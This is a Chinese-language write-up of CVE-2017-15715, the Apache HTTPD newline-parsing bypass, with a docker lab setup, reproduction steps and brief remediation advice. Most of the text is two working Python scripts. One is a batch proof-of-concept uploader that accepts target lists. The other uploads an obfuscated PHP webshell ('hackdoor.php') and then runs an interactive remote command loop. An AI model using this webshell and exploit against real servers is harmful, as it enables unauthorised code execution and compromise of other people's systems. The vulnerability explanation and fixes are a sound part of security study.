漏洞描述
Apache HTTPD是一款HTTP服務器,它可以通過mod_php來運行PHP網頁。其2.4.0~2.4.29版本中存在一個解析漏洞,在解析PHP時,1.php\x0A將被按照PHP后綴進行解析,導致繞過一些服務器的安全策略。
影響版本 :Apache 2.4.0~2.4.29
影響說明 :繞過服務器策略,上傳webshell
原因:apache這次解析漏洞的根本原因就是這個 $,正則表達式中,我們都知道$用來匹配字符串結尾位置,我們來看看菜鳥教程中對正則表達符$的解釋:
匹配輸入字符串的結尾位置。如果設置了 RegExp 對象的 Multiline 屬性,則 $ 也匹配 '\n' 或 '\r'。要匹配 $ 字符本身,請使用 \$。
那么就明白了,在設置了 RegExp 對象的 Multiline 屬性的條件下,$還會匹配到字符串結尾的換行符
環境搭建
進入漏洞目錄
cd /home/vulhub/vulhub/httpd/CVE-2017-15715
開啟docker環境
docker-compose up -d
測試
漏洞復現
上傳文件,使用burpsuite抓包,被攔截
切換到Hex,在1.php后添加0a
插入0a
發送數據包,成功上傳
進docker環境,查看文件是否存在
#查看鏡像CONTAINER ID
docker ps
#進入指定CONTAINER ID的環境
docker exec -it 68f4c0a3f85c bash
測試
http://192.168.132.142:8080/1.php%0A
POC和EXP腳本
POC代碼
#CVE-2017-15715-POC
__author__ = '紙機'
import requests
import optparse
import os
parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
parse.add_option('-f',dest='FILE',help='target list')
options,args = parse.parse_args()
#print(options)
#驗證參數是否完整
if (not options.URL or not options.PORT) and not options.FILE:
print('Usage:python3 CVE-2017-15715-POC.py [-u url] [-p port] [-f FILE]\n')
exit('CVE-2017-15715-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
filename = '/2.php%0A'
headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
'Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'
}
#提交數據
data = '''-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-stream
aaa
-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="name"
2.php
-----------------------------153388130435749919031880185481--'''
#驗證鏈接
#url2 = options.URL+':'+options.PORT+filename
def upload(url):
try:
#上傳文件
resp = requests.post(url,headers=headers,data=data)
return 1
except Exception as e:
print("[-] {0} 連接失敗".format(url))
return 0
def checking(url):
try:
#驗證文件是否上傳成功
response = requests.get(url+filename)
if response.status_code == 200 and 'aaa' in response.text:
print('[+] {0} 存在CVE-2017-15715 Apache HTTPD 換行解析漏洞'.format(url))
else:
print('[-] {0} 不存在Apache HTTPD 換行解析漏洞'.format(url))
except Exception as e:
print("[-]{0}連接失敗".format(url))
if options.FILE and os.path.exists(options.FILE):
with open(options.FILE) as f:
urls = f.readlines()
#print(urls)
for url in urls:
url = str(url).replace("\n", "")
if upload(url) == 1:
checking(url)
elif options.FILE and not os.path.exists(options.FILE):
print('[-] {0} 文件不存在'.format(options.FILE))
else:
#上傳鏈接
url = options.URL+':'+options.PORT
if upload(url) == 1:
checking(url)
測試
python3 CVE-2017-15715-POC.py -u http://192.168.132.144 -p 9998
python3 CVE-2017-15715-POC.py -f IP.txt
EXP代碼
#CVE-2017-15715 EXP
__author__ = 'zhiji'
import requests
import optparse
import time
parse = optparse.OptionParser(usage = 'python3 %prog -u url [-p port] version=1.0')
parse.add_option('-u','--url',dest='url',help='web server ip_addr')
parse.add_option('-p','--port',dest='port',help='web server port[default:8080]',default='8080')
options,args = parse.parse_args()
#驗證參數是否完整
if not options.url or not options.port:
print('Usage:python3 CVE-2017-15715-EXP.py -u url -p port\n')
exit('CVE-2017-15715-EXP.py:error:missing a mandatory option(-u,-p).\nUse -h for basic and -hh for advanced help')
#ip = '192.168.132.142:8080/'
filename = '/hackdoor.php%0a?0='
#上傳鏈接
url1 = options.url+':'+options.port
#命令執行
url2 = options.url+':'+options.port+filename
#數據包頭部
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
'Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'
}
#上傳數據
data = '''-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="file"; filename="hackdoor.php"
Content-Type: application/octet-stream
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="name"
hackdoor.php
-----------------------------153388130435749919031880185481--'''
#上傳木馬
def upload(url):
print('[*]目標地址:'+url1)
respond = requests.post(url1,headers=headers,data=data)
try:
if respond.status_code == 200:
print('[+]木馬上傳成功')
else:
print('[-]上傳失敗')
except Exception as e:
print(e)
#命令執行
def attack(url,cmd):
respond = requests.get(url+cmd)
try:
if respond.status_code == 200 and cmd == 'pwd':
return respond.text
if respond.status_code == 200:
print(respond.text)
else:
print('命令執行錯誤')
except Exception as e:
print(e)
upload(url1)
time.sleep(0.5)
print('輸入執行命令(quit退出):')
while(1):
pwd = attack(url2,'pwd')
pwd = '{0}>'.format(str(pwd).replace("\n",""))
cmd = input(pwd)
if(cmd == 'quit'):
break
attack(url2,cmd)
測試
python3 CVE-2017-15715-EXP.py -u http://192.168.132.144 -p 9998
修復建議
-
升級到最新版本
-
對上傳文件重命名
-
禁用上傳文件的執行權限
參考文章
https://blog.csdn.net/weixin_40412037/article/details/105730577